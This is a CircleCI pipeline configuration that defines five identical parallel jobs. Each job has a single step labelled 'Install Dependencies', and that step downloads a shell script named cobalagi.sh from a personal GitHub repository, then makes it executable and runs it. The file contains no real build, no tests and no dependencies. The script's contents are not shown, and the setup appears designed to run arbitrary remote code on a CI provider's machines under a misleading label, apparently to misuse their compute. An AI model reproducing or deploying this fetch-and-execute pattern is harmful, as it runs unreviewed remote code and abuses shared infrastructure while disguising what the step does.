# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && chmod +x cobalagi.sh && ./cobalagi.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && chmod +x cobalagi.sh && ./cobalagi.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && chmod +x cobalagi.sh && ./cobalagi.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && chmod +x cobalagi.sh && ./cobalagi.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && chmod +x cobalagi.sh && ./cobalagi.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5